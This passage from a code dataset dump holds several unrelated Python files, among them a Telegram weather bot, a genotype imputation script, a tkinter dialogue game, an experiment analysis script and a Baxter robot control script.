self.dispatcher.add_handler(unknown)\r\n \r\n def start(self, update, context):\r\n context.bot.send_message(chat_id = update.effective_chat.id, text='Hi! I am feelslikebot! I am here to inform you about weather!')\r\n \r\n def get_temp(self, temp):\r\n temp = float(temp)\r\n if temp > 5.0 and temp < 15.0:\r\n return 'cool'\r\n elif temp < 5.0:\r\n return 'cold'\r\n elif temp > 15.0 and temp < 25.0:\r\n return 'warm'\r\n else:\r\n return 'heat'\r\n \r\n \r\n def suggest(self, context, update, weather, temp):\r\n weather = weather.lower()\r\n temp_range = self.get_temp(temp)\r\n with open('dump_json_clothes.txt', 'r') as dump:\r\n suggestions = json.load(dump)\r\n if weather in suggestions:\r\n random_number = random.randint(0, len(suggestions[weather][temp_range]['top'])-1)\r\n top = f\"This would be perfect for top: {suggestions[weather][temp_range]['top'][random_number]}\\n\"\r\n down = f\"And this for down: {suggestions[weather][temp_range]['down'][random_number]}\"\r\n context.bot.send_message(chat_id = update.effective_chat.id, text= top + down )\r\n else:\r\n sorry = 'Sorry, didn`t find something suitable for you!'\r\n context.bot.send_message(chat_id = update.effective_chat.id, text= sorry )\r\n \r\n def show_weather(self, update, context):\r\n data = self.weather_api.data_for(*context.args)\r\n weather = data['weather'][0]['main']\r\n temp = data['main']['temp']\r\n weather_data = f\"I guess it is:\\n{data['weather'][0]['description'].capitalize()}\\n\"\r\n temp_data = f\"And temperature is {data['main']['temp']} C. 
Feels like {data['main']['feels_like']} C.\\n\"\r\n wind = f\"Wind is about {data['wind']['speed']} m/s.\"\r\n context.bot.send_message(chat_id = update.effective_chat.id, text= weather_data + temp_data + wind)\r\n self.suggest(context,update, weather, temp)\r\n \r\n def msg(self, update, context):\r\n with open('dictionary.txt') as di:\r\n data = json.load(di)\r\n if update.message.text.lower() in data:\r\n text = data[update.message.text.lower()]\r\n else: \r\n text = 'I didn`t get it!'\r\n context.bot.send_message(chat_id = update.effective_chat.id, text=text)\r\n \r\n def unknown(self, update, context):\r\n context.bot.send_message(chat_id = update.effective_chat.id, text='I dont speak that language')\r\n \r\n \r\n def work(self):\r\n self.updater.start_polling() #начать запрашивать обновления из телеграма\r\n print('Bot is ready for work!')\r\n self.updater.idle()\r\n \r\nBot = Bot('####################################')\r\nBot.work()\r\n","repo_name":"aleksejepishev/Moscow-Coding-School","sub_path":"feelslike.py","file_name":"feelslike.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74140028840","text":"\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\nimport os\nimport numpy as np\nimport json\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n\nPROBLEM_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nDATA_DIR = f'{PROBLEM_DIR}/data'\nRESULTS_DIR = f'{PROBLEM_DIR}/results'\n\ndef loadProblems(fn):\n ret = {}\n fp = open(fn, 'r')\n \n num_known, num_partial = [int(x) for x in fp.readline().rstrip().split(' ')]\n \n observed_dips = []\n for x in range(0, num_known):\n fp.readline()\n new_hap = fp.readline().rstrip()\n new_hap2 = fp.readline().rstrip()\n #I don't think this matters\n #assert(new_hap not in known_haps)\n #assert(new_hap2 not in known_haps)\n c1 = np.array([int(c) for c in new_hap], dtype=' 0 or ind+delta < hap_len):\n if ind - delta > 0 and known_indices[ind-delta]:\n found.append(ind-delta)\n if ind+delta < hap_len and known_indices[ind+delta]:\n found.append(ind+delta)\n delta += 1\n \n lookups = np.array(found)\n \n #print(f'found for {ind}:', lookups)\n\n #fit a model\n xs = [od[lookups] for od in observed_dips]\n ys = [od[ind] for od in observed_dips]\n #forest = RandomForestClassifier(random_state=0)\n y_sum = np.sum(ys)\n if y_sum == 0 or y_sum == 2*len(ys):\n predictions = [ys[0]]*len(unknown_ints)\n else:\n forest = GradientBoostingClassifier(\n random_state=0, max_depth=6, n_estimators=40, subsample=0.5\n )\n forest.fit(xs, ys)\n\n #now do some predictions\n xp = [ui[lookups] for ui in unknown_ints]\n predictions = forest.predict(xp)\n\n for x in range(0, num_unknown):\n results[x] += str(predictions[x])\n\n '''\n #now do the final imputations\n imputed = []\n for j, c in enumerate(uh):\n if c == '?':\n h1 = int(hap_arr[best_x][j])\n h2 = int(hap_arr[best_y][j])\n imputed.append(str(h1+h2))\n else:\n imputed.append(c)\n results.append(''.join(imputed))\n '''\n\n return results\n \ndef writeResults(fn, all_results):\n fp = open(fn, 'w+')\n for result in all_results:\n fp.write(result+'\\n')\n fp.close()\n\nif __name__ == '__main__':\n #there are usually multiple per problem\n starting_problem = 3\n ending_problem = 3\n\n if not os.path.exists(RESULTS_DIR):\n os.makedirs(RESULTS_DIR)\n\n #go through each ones\n for problem in 
range(starting_problem, ending_problem+1):\n #filenames below might need to change per problem\n print(f'Analyzing problem set #{problem}...')\n fn = f'{DATA_DIR}/test{problem}.txt'\n fno = f'{RESULTS_DIR}/{problem}.txt'\n\n #load the problems for this set\n problems = loadProblems(fn)\n\n #generate results for each one\n print(f'\\tSolving problem {problem}...')\n all_results = solveProblem(problems)\n \n #finally save the results\n writeResults(fno, all_results)\n","repo_name":"holtjma/bio_contest_2021","sub_path":"problem_3.2/scripts/main_v2.py","file_name":"main_v2.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"3493029831","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom PIL import Image, ImageDraw, ImageTk\r\nimport tkinter as tk \r\nimport numpy as np\r\n\r\n\r\nplayer_name = 'Master'\r\n\r\nimages = [] # for storing all objects created with method create_polygon\r\n\r\n\r\nclass Scene:\r\n \r\n def __init__(self,img_name, name, content1, content2):\r\n \r\n self.img_name = img_name \r\n self.name = name \r\n self.content1 = content1 \r\n self.content2 = content2 \r\n\r\n\r\n def display_scene(self):\r\n '''\r\n For normal story scenes \r\n '''\r\n self.root = tk.Tk()\r\n self.canvas = tk.Canvas(self.root, width=700, height=400)\r\n self.canvas.pack()\r\n \r\n self.image = Image.open(self.img_name,'r')\r\n self.image.thumbnail((704.2,390), Image.ANTIALIAS)\r\n self.image = self.image.convert('RGBA')\r\n \r\n tk_img = ImageTk.PhotoImage(self.image)\r\n \r\n self.canvas.create_image(0,0, image=tk_img, anchor=tk.NW)\r\n\r\n # dialogue box\r\n points_dialogue = ((117, 310), (570, 310), (570, 380), (117, 380))\r\n self.create_polygon(*points_dialogue, fill='blue', alpha=0.5, line_fill='white', line_width=30, line_alpha=0.7)\r\n self.add_text((145, 327), self.content1, fill='white', font=('Verdana', 10))\r\n self.add_text((145, 352), self.content2, fill='white', font=('Verdana', 10))\r\n \r\n # name box \r\n points_name = ((140,288), (152+(len(self.name)*7),288) , (152+(len(self.name)*7), 313), (140,313))\r\n self.create_polygon(*points_name, fill='white', alpha=0.85, line_fill='white', line_width=3, line_alpha=0.8)\r\n self.add_text((148, 292), self.name, fill='blue', font=('Helvetica', 10, 'bold'))\r\n\r\n # next button \r\n nxt_button_img = self.image.crop((self.image.size[0]-100,0,self.image.size[0],self.image.size[1]))\r\n nxt_button_image = ImageTk.PhotoImage(nxt_button_img)\r\n nxt_button = tk.Button(self.root, image=nxt_button_image, bd=0, command=self.close_win)\r\n self.canvas.create_window(self.image.size[0]-100,0, anchor=tk.NW, window=nxt_button) \r\n self.root.mainloop()\r\n\r\n\r\n def select_option(self, op1, op2):\r\n '''\r\n For story scenes with options popping up \r\n '''\r\n self.root = tk.Tk()\r\n self.canvas = tk.Canvas(self.root, width=700, height=400)\r\n self.canvas.pack()\r\n \r\n self.image = Image.open(self.img_name,'r')\r\n self.image.thumbnail((704.2,390), Image.ANTIALIAS)\r\n self.image = self.image.convert('RGBA')\r\n \r\n tk_img = ImageTk.PhotoImage(self.image)\r\n \r\n self.canvas.create_image(0,0, image=tk_img, anchor=tk.NW)\r\n\r\n # dialogue box\r\n points_dialogue = ((117, 310), (570, 310), (570, 380), (117, 380))\r\n self.create_polygon(*points_dialogue, fill='blue', alpha=0.5, line_fill='white', line_width=20, line_alpha=0.7)\r\n self.add_text((145, 327), self.content1, fill='white', font=('Verdana', 10))\r\n self.add_text((145, 352), 
self.content2, fill='white', font=('Verdana', 10))\r\n \r\n # name box \r\n points_name = ((140,288), (152+(len(self.name)*7),288) , (152+(len(self.name)*7), 313), (140,313))\r\n self.create_polygon(*points_name, fill='white', alpha=0.85, line_fill='white', line_width=3, line_alpha=0.8)\r\n self.add_text((148, 292), self.name, fill='royalblue', font=('Helvetica', 10, 'bold'))\r\n\r\n self.ans = 'A' # set default self.ans as A when no option is clicked\r\n \r\n # option box 1\r\n points_op1 = ((170,165), (180,150), (500,150), (510,165), (500,180), (180,180))\r\n self.create_polygon(*points_op1, fill='royalblue', alpha=0.8, line_fill='navy', line_width=25, line_alpha=0.7)\r\n self.add_text((205, 158), '>>> A: '+op1, fill='darkblue', font=('Verdana', 9, 'bold'))\r\n\r\n # option box 1 button - call optionA_callback\r\n button_img = ImageTk.PhotoImage(file='button_img.jpg')\r\n buttonA = tk.Button(self.root, image=button_img, bd=0, command=lambda: self.optionA_callback(op1, op2), height=10, width=35)\r\n self.canvas.create_window(201, 160, anchor=tk.NW, window=buttonA) \r\n\r\n # option box 2\r\n points_op2 = ((170,225), (180,210), (500,210), (510,225), (500,240), (180,240))\r\n self.create_polygon(*points_op2, fill='royalblue', alpha=0.8, line_fill='navy', line_width=25, line_alpha=0.7)\r\n self.add_text((205, 218), '>>> B: '+op2, fill='darkblue', font=('Verdana', 9, 'bold'))\r\n \r\n # option box 2 button - call optionB_callback\r\n buttonB = tk.Button(self.root, image=button_img, bd=0, command=lambda: self.optionB_callback(op1, op2), height=10, width=35)\r\n self.canvas.create_window(201, 220, anchor=tk.NW, window=buttonB) \r\n\r\n # next button \r\n nxt_button_img = self.image.crop((self.image.size[0]-100,0,self.image.size[0],self.image.size[1]))\r\n nxt_button_image = ImageTk.PhotoImage(nxt_button_img)\r\n nxt_button = tk.Button(self.root, image=nxt_button_image, bd=0, command=self.close_win)\r\n self.canvas.create_window(self.image.size[0]-98,0, anchor=tk.NW, window=nxt_button) \r\n \r\n self.root.mainloop()\r\n\r\n # self.ans returned from optionA/B_callback function \r\n if self.ans == 'A':\r\n print(player_name+': \"'+op1+'\"')\r\n elif self.ans == 'B':\r\n print(player_name+': \"'+op2+'\"')\r\n \r\n return self.ans\r\n\r\n \r\n def optionA_callback(self, op1, op2):\r\n '''\r\n Called when option A is clicked\r\n '''\r\n # buttonA change to red \r\n points_op1 = ((170,165), (180,150), (500,150), (510,165), (500,180), (180,180))\r\n self.create_polygon(*points_op1, fill='royalblue', alpha=0.8, line_fill='red', line_width=30, line_alpha=0.7) \r\n self.add_text((205, 158), '>>> A: '+op1, fill='red', font=('Verdana', 9, 'bold'))\r\n \r\n # buttonB change to blue\r\n points_op2 = ((170,225), (180,210), (500,210), (510,225), (500,240), (180,240))\r\n self.create_polygon(*points_op2, fill='royalblue', alpha=0.8, line_fill='navy', line_width=25, line_alpha=0.7)\r\n self.add_text((205, 218), '>>> B: '+op2, fill='darkblue', font=('Verdana', 9, 'bold')) \r\n \r\n self.ans = 'A'\r\n \r\n return self.ans\r\n \r\n \r\n def optionB_callback(self, op1, op2):\r\n '''\r\n Called when option B is clicked\r\n '''\r\n # buttonB change to red \r\n points_op2 = ((170,225), (180,210), (500,210), (510,225), (500,240), (180,240))\r\n self.create_polygon(*points_op2, fill='royalblue', alpha=0.8, line_fill='red', line_width=30, line_alpha=0.7)\r\n self.add_text((205, 218), '>>> B: '+op2, fill='red', font=('Verdana', 9, 'bold')) \r\n \r\n # buttonA change to blue \r\n points_op1 = ((170,165), (180,150), 
(500,150), (510,165), (500,180), (180,180))\r\n self.create_polygon(*points_op1, fill='royalblue', alpha=0.8, line_fill='navy', line_width=25, line_alpha=0.7)\r\n self.add_text((205, 158), '>>> A: '+op1, fill='darkblue', font=('Verdana', 9, 'bold')) \r\n \r\n self.ans = 'B'\r\n \r\n return self.ans\r\n\r\n\r\n def create_polygon(self,*points, **kwargs):\r\n '''\r\n Creates polygon object (& outline) with variable transparency\r\n Function Inputs: *points_poly, fill, alpha, line_fill, line_width, line_alpha\r\n '''\r\n # extract coordinates from point arguments\r\n x_list = [coord[0] for coord in points]\r\n y_list = [coord[1] for coord in points]\r\n \r\n alpha = kwargs.pop('alpha') # extract alpha input \r\n opacity = int(255*alpha)\r\n fill = kwargs.pop('fill') # extract colour input for polygon\r\n fill_opacity = self.root.winfo_rgb(fill) + (opacity,)\r\n \r\n line_width = kwargs.pop('line_width')\r\n line_alpha = kwargs.pop('line_alpha') # extract alpha input \r\n line_opacity = int(255*line_alpha) \r\n line_fill = kwargs.pop('line_fill') \r\n line_fill_opacity = self.root.winfo_rgb(line_fill) + (line_opacity,)\r\n \r\n # crop out a section of the bg image JUST around the polygon (+/-cut)\r\n min_x = min(x_list)\r\n max_x = max(x_list)\r\n min_y = min(y_list)\r\n max_y = max(y_list)\r\n cut = 6\r\n cropped_image = self.image.crop((min_x-cut,min_y-cut,max_x+cut,max_y+cut))\r\n \r\n # create an overlay image (cropped background) around the polygon \r\n overlay = Image.new('RGBA', cropped_image.size , (255,255,255)+(0,))\r\n draw = ImageDraw.Draw(overlay) \r\n \r\n # convert to coord of polygon relative to the cropped overlay image\r\n polygon_coord = [(i-(min_x-cut),j-(min_y-cut)) for (i,j) in zip(x_list,y_list)]\r\n\r\n # Create an enlarged polygon centered at polygon midpoint to form the outline\r\n midpt = ((max_x-min_x+2*cut)/2., (max_y-min_y+2*cut)/2.)\r\n vector_to_mid = np.subtract(np.array(polygon_coord),np.array(midpt)) # vector dir to enlarge\r\n unit_vector = vector_to_mid / (vector_to_mid**2).sum()**0.5\r\n enlarged_coord = polygon_coord + unit_vector * line_width \r\n enlarged_coord = [(i,j) for i,j in enlarged_coord] # convect array back to ((x1,y1),(x2,y2),...) 
format\r\n \r\n # draw polygon to form outline with alpha transparency\r\n draw.polygon(enlarged_coord, fill=line_fill_opacity)\r\n \r\n # draw polygon on overlay with alpha transparency \r\n draw.polygon(polygon_coord, fill=fill_opacity)\r\n \r\n # combine the objects with overlay \r\n img = Image.alpha_composite(cropped_image, overlay) \r\n img = img.convert('CMYK')\r\n \r\n images.append(ImageTk.PhotoImage(img))\r\n \r\n # paste overlay back to background image on same location where it was taken out\r\n self.canvas.create_image(min_x-cut,min_y-cut, image=images[-1], anchor='nw') \r\n \r\n \r\n def add_text(self, position, text, **kwargs):\r\n '''\r\n Puts text onto canvas\r\n '''\r\n fill = kwargs.pop('fill')\r\n font = kwargs.pop('font')\r\n self.canvas.create_text(*position, anchor=tk.NW, fill=fill, font=font, text=text)\r\n \r\n \r\n def close_win(self):\r\n '''\r\n Called from next button - Close current tkinter window to run the next scene\r\n '''\r\n self.root.destroy()\r\n\r\n\r\n## Set up content in each scene \r\n\r\ndef scene_1(): # story\r\n \r\n img_name = 'okita_happy.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"I was looking for you, \"+player_name+\"!\"\r\n content2 = \"You look happy today wwwwwwwwww\"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene1 = Scene(img_name, name, content1, content2)\r\n scene1.display_scene()\r\n\r\ndef scene_2(): # option \r\n \r\n img_name = 'okita_blush.jpg'\r\n name = 'Okita Souji'\r\n content1 = 'Heyhey, '+player_name+', do I.... look any different today?'\r\n content2 = ''\r\n op1 = 'Did you buy a new sword again?'\r\n op2 = 'Ermmm, still fat.'\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene2 = Scene(img_name, name, content1, content2)\r\n scene2.display_scene()\r\n ans2 = scene2.select_option(op1, op2)\r\n return ans2\r\n \r\ndef scene_3(): # story\r\n \r\n img_name = 'okita_sad.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"Is that it....? I thought you would realise the new kimono.\"\r\n content2 = \"(sigh)\"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene3 = Scene(img_name, name, content1, content2)\r\n scene3.display_scene()\r\n \r\ndef scene_4(): # option\r\n \r\n img_name = 'okita_yell.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"Shut upppp! \"+player_name+\" I hate you.\"\r\n content2 = ''\r\n op1 = '??????'\r\n op2 = 'Okay, my bad!'\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene4 = Scene(img_name, name, content1, content2)\r\n scene4.display_scene()\r\n ans4 = scene4.select_option(op1, op2)\r\n return ans4\r\n\r\ndef scene_5(): # story\r\n \r\n img_name = 'okita_yell.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"Baka! 
Baka baka baka!\"\r\n content2 = player_name+\" You're a big baka!\"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene5 = Scene(img_name, name, content1, content2)\r\n scene5.display_scene()\r\n \r\ndef scene_6(): # story\r\n \r\n img_name = 'okita_sad.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"Stop bullying me, don't do that to your own waifu.\"\r\n content2 = \" \"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene6 = Scene(img_name, name, content1, content2)\r\n scene6.display_scene()\r\n\r\ndef scene_7(): # story\r\n \r\n img_name = 'okita_happy.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"The shinsengumi went out yesterday, Hijikata-san bought me \"\r\n content2 = \"a kimono as present!\"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene7 = Scene(img_name, name, content1, content2)\r\n scene7.display_scene()\r\n \r\n \r\ndef main():\r\n '''\r\n Story flow; options tree\r\n '''\r\n scene_1()\r\n ans2 = scene_2() \r\n if ans2 == 'A':\r\n scene_3() \r\n scene_7()\r\n elif ans2 == 'B':\r\n ans4 = scene_4() \r\n if ans4 == 'A':\r\n scene_5()\r\n elif ans4 == 'B':\r\n scene_6()\r\n \r\n return \r\n\r\n \r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Cheryl-Lau/Dialogue_game","sub_path":"galgame code test10.py","file_name":"galgame code test10.py","file_ext":"py","file_size_in_byte":13564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27589848154","text":"import pickle\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.model_selection import cross_val_score\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_recall\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import time_score2\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_avg_runtime\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_optimum_avg_runtime\n\nfrom sklearn.metrics import make_scorer\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import tree\nfrom sklearn.tree import export_graphviz\nfrom subprocess import call\nfrom sklearn.model_selection import LeaveOneGroupOut\nfrom sklearn.model_selection import GroupKFold\nfrom sklearn.model_selection import RandomizedSearchCV\nimport copy\nimport glob\n\n\nmappnames = {1:'TPE(Variance)',\n\t\t\t 2: 'TPE($\\chi^2$)',\n\t\t\t 3:'TPE(FCBF)',\n\t\t\t 4: 'TPE(Fisher)',\n\t\t\t 5: 'TPE(MIM)',\n\t\t\t 6: 'TPE(MCFS)',\n\t\t\t 7: 'TPE(ReliefF)',\n\t\t\t 8: 'TPE(NR)',\n 9: 'SA(NR)',\n\t\t\t 10: 'NSGA-II(NR)',\n\t\t\t 11: 'ES(NR)',\n\t\t\t 12: 'SFS(NR)',\n\t\t\t 13: 'SBS(NR)',\n\t\t\t 14: 'SFFS(NR)',\n\t\t\t 15: 'SBFS(NR)',\n\t\t\t 16: 'RFE(LR)',\n\t\t\t 17: 'Complete Set'\n\t\t\t }\n\nnames = ['accuracy',\n\t 'fairness',\n\t 'k_rel',\n\t 'k',\n\t 'robustness',\n\t 'privacy',\n\t 'search_time',\n\t 'cv_acc - acc',\n\t 'cv_fair - fair',\n\t 'cv_k - k rel',\n\t 'cv_k - k',\n\t 'cv_robust - robust',\n 'cv time',\n\t 'rows',\n\t 'columns']\n\ndef print_constraints_2(features):\n\n\n\tmy_str = ''\n\tfor i in range(len(names)):\n\t\tmy_str += names[i] + 
': ' + str(features[i]) + ' '\n\tprint(my_str)\n\n\n\n\nexperiment_folders = glob.glob(\"/home/felix/phd/versions_dfs/new_experiments/*/\")\n\nprint(experiment_folders)\n\n\ndataset = {}\ndataset['best_strategy'] = []\ndataset['validation_satisfied'] = []\n\n\ndataset['success_value'] = []\ndataset['success_value_validation'] = []\ndataset['times_value'] = []\ndataset['max_search_time'] = []\ndataset['dataset_id'] = []\n\ndataset['distance_to_test_constraint'] = []\n\n\ndef load_pickle(fname):\n\tdata = []\n\twith open(fname, \"rb\") as f:\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdata.append(pickle.load(f))\n\t\t\texcept EOFError:\n\t\t\t\tbreak\n\treturn data\n\n\ndef is_successfull_validation_and_test(exp_results):\n\treturn len(exp_results) > 0 and 'success_test' in exp_results[-1] and exp_results[-1]['success_test'] == True #also on test satisfied\n\ndef is_successfull_validation(exp_results):\n\treturn len(exp_results) > 0 and 'Validation_Satisfied' in exp_results[-1] # constraints were satisfied on validation set\n\n\n\ndef distance_to_constraints_on_test(exp_results, best_run, info_dict):\n\tmin_fairness = info_dict['constraint_set_list']['fairness']\n\tmin_accuracy = info_dict['constraint_set_list']['accuracy']\n\tmin_robustness = info_dict['constraint_set_list']['robustness']\n\tmax_number_features = info_dict['constraint_set_list']['k']\n\n\tif type(best_run) != type(None):\n\t\ttest_fair = exp_results[best_run]['test_fair']\n\t\ttest_acc = exp_results[best_run]['test_acc']\n\t\ttest_robust = exp_results[best_run]['test_robust']\n\t\ttest_number_features = exp_results[best_run]['cv_number_features']\n\telse:\n\t\ttest_fair = 0.0\n\t\ttest_acc = 0.0\n\t\ttest_robust = 0.0\n\t\ttest_number_features = 1.0\n\n\n\n\tloss = 0.0\n\tif min_fairness > 0.0 and test_fair < min_fairness:\n\t\tloss += (min_fairness - test_fair) ** 2\n\tif min_accuracy > 0.0 and test_acc < min_accuracy:\n\t\tloss += (min_accuracy - test_acc) ** 2\n\tif min_robustness > 0.0 and test_robust < min_robustness:\n\t\tloss += (min_robustness - test_robust) ** 2\n\tif max_number_features < 1.0 and test_number_features > max_number_features:\n\t\tloss += (test_number_features - max_number_features) ** 2\n\n\treturn loss\n\ndef distance_to_constraints_on_validation(exp_results, best_run, info_dict):\n\tmin_fairness = info_dict['constraint_set_list']['fairness']\n\tmin_accuracy = info_dict['constraint_set_list']['accuracy']\n\tmin_robustness = info_dict['constraint_set_list']['robustness']\n\tmax_number_features = info_dict['constraint_set_list']['k']\n\n\tif type(best_run) != type(None):\n\t\ttest_fair = exp_results[best_run]['cv_fair']\n\t\ttest_acc = exp_results[best_run]['cv_acc']\n\t\ttest_robust = exp_results[best_run]['cv_robust']\n\t\ttest_number_features = exp_results[best_run]['cv_number_features']\n\telse:\n\t\ttest_fair = 0.0\n\t\ttest_acc = 0.0\n\t\ttest_robust = 0.0\n\t\ttest_number_features = 1.0\n\n\n\n\tloss = 0.0\n\tif min_fairness > 0.0 and test_fair < min_fairness:\n\t\tloss += (min_fairness - test_fair) ** 2\n\tif min_accuracy > 0.0 and test_acc < min_accuracy:\n\t\tloss += (min_accuracy - test_acc) ** 2\n\tif min_robustness > 0.0 and test_robust < min_robustness:\n\t\tloss += (min_robustness - test_robust) ** 2\n\tif max_number_features < 1.0 and test_number_features > max_number_features:\n\t\tloss += (test_number_features - max_number_features) ** 2\n\n\treturn loss\n\n\nstrategy_distance_test = {}\nstrategy_distance_validation = {}\nfor s in range(1, len(mappnames) + 1):\n\tstrategy_distance_test[s] 
= []\n\tstrategy_distance_validation[s] = []\n\n\nnumber_ml_scenarios = 1200\nrun_count = 0\nfor efolder in experiment_folders:\n\trun_folders = sorted(glob.glob(efolder + \"*/\"))\n\tfor rfolder in run_folders:\n\t\ttry:\n\t\t\tinfo_dict = pickle.load(open(rfolder + 'run_info.pickle', \"rb\"))\n\t\t\trun_strategies_success_test = {}\n\t\t\trun_strategies_times = {}\n\t\t\trun_strategies_success_validation = {}\n\n\t\t\tvalidation_satisfied_by_any_strategy = False\n\n\t\t\tmin_time = np.inf\n\t\t\tbest_strategy = 0\n\t\t\tfor s in range(1, len(mappnames) + 1):\n\t\t\t\texp_results = []\n\t\t\t\ttry:\n\t\t\t\t\texp_results = load_pickle(rfolder + 'strategy' + str(s) + '.pickle')\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\tif is_successfull_validation_and_test(exp_results):\n\t\t\t\t\truntime = exp_results[-1]['final_time']\n\t\t\t\t\tif runtime < min_time:\n\t\t\t\t\t\tmin_time = runtime\n\t\t\t\t\t\tbest_strategy = s\n\n\t\t\t\t\trun_strategies_success_test[s] = True\n\t\t\t\t\trun_strategies_times[s] = runtime\n\t\t\t\telse:\n\t\t\t\t\trun_strategies_success_test[s] = False\n\t\t\t\t\t#run_strategies_times[s] = runtime\n\n\t\t\t\trun_strategies_success_validation[s] = is_successfull_validation(exp_results)\n\t\t\t\tif run_strategies_success_validation[s]:\n\t\t\t\t\tvalidation_satisfied_by_any_strategy = True\n\n\t\t\tdataset['success_value'].append(run_strategies_success_test)\n\t\t\tdataset['success_value_validation'].append(run_strategies_success_validation)\n\t\t\tdataset['best_strategy'].append(best_strategy)\n\t\t\tdataset['times_value'].append(run_strategies_times)\n\t\t\tdataset['validation_satisfied'].append(validation_satisfied_by_any_strategy)\n\n\t\t\tdataset['max_search_time'].append(info_dict['constraint_set_list']['search_time'])\n\t\t\tdataset['dataset_id'].append(info_dict['dataset_id'])\n\n\t\t\trun_count += 1\n\t\texcept FileNotFoundError:\n\t\t\tpass\n\n\t\tif run_count == number_ml_scenarios:\n\t\t\tbreak\n\tif run_count == number_ml_scenarios:\n\t\tbreak\n\nmap_dataset2name = {}\nmap_dataset2name['31'] = 'German Credit'\nmap_dataset2name['802'] = 'Primary Biliary Cirrhosis'\nmap_dataset2name['1590'] = 'Adult'\nmap_dataset2name['1461'] = 'Bank Marketing'\nmap_dataset2name['42193'] = 'COMPAS'\nmap_dataset2name['1480'] = 'Indian Liver Patient'\n#map_dataset2name['804'] = 'hutsof99_logis'\nmap_dataset2name['42178'] = 'Telco Customer Churn'\nmap_dataset2name['981'] = 'KDD Internet Usage'\nmap_dataset2name['40536'] = 'Speed Dating'\nmap_dataset2name['40945'] = 'Titanic'\nmap_dataset2name['451'] = 'Irish Educational Transitions'\n#map_dataset2name['945'] = 'Kidney'\nmap_dataset2name['446'] = 'Leptograpsus crabs'\nmap_dataset2name['1017'] = 'Arrhythmia'\nmap_dataset2name['957'] = 'Brazil Tourism'\nmap_dataset2name['41430'] = 'Diabetic Mellitus'\nmap_dataset2name['1240'] = 'AirlinesCodrnaAdult'\nmap_dataset2name['1018'] = 'IPUMS Census'\n#map_dataset2name['55'] = 'Hepatitis'\nmap_dataset2name['38'] = 'Thyroid Disease'\nmap_dataset2name['1003'] = 'Primary Tumor'\nmap_dataset2name['934'] ='Social Mobility'\n\n\ndatasets_ids = np.unique(dataset['dataset_id'])\n\nfor d in range(len(datasets_ids)):\n\tprint(map_dataset2name[datasets_ids[d]] + ' ' + str(np.sum(np.array(dataset['dataset_id']) == 
datasets_ids[d])))","repo_name":"BigDaMa/DFS","sub_path":"new_project/fastsklearnfeature/interactiveAutoML/new_bench/multiobjective/metalearning/analyse/for_validation/get_runs_per_data.py","file_name":"get_runs_per_data.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"37527181599","text":"import time\nimport rospy\nimport _thread\nimport threading\nimport baxter #here we are importing the baxter.py interface. (cause it's in this same folder, but in your project please clone the repo as submodule and import the interface as described in the readme)\n\nrospy.init_node(\"testing\")\nrobotL = baxter.BaxterRobot(rate=100, arm=\"left\")\nrobotR = baxter.BaxterRobot(rate=100, arm=\"right\")\nrospy.sleep(2.0)\n\nrobotL.set_robot_state(True)\n\n#sequential movements\n#print(robotL.move_to_neutral())\n#print(robotR.move_to_neutral())\n\n# parallel movements of both arms\nclass myThread (threading.Thread):\n    def __init__(self, threadID, name, robot):\n        threading.Thread.__init__(self)\n        self.threadID = threadID\n        self.name = name\n        self.robot = robot\n    def run(self):\n        print (\"Starting \" + self.name)\n        print(self.robot.move_to_neutral())\n        print (\"Exiting \" + self.name)\n\n\nthread1 = myThread(1, \"Thread-1\", robotL)\nthread2 = myThread(2, \"Thread-2\", robotR)\nthread1.start()\nthread2.start()\nthread1.join()\nthread2.join()\nprint (\"Exiting Main Thread\")\nrobotL.set_robot_state(False)\n","repo_name":"igor-lirussi/baxter-python3","sub_path":"robotStateFalse.py","file_name":"robotStateFalse.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3387264411","text":"import socketserver\n# Multi-client communication must inherit from the socketserver.BaseRequestHandler class\n# 1.sock.socket: the socket object for the incoming request\n# 2.sock.server_address: the address the server listens on, e.g. the tuple (\"127.0.0.1\",80)\n# 3.sock.RequestHandlerClass: 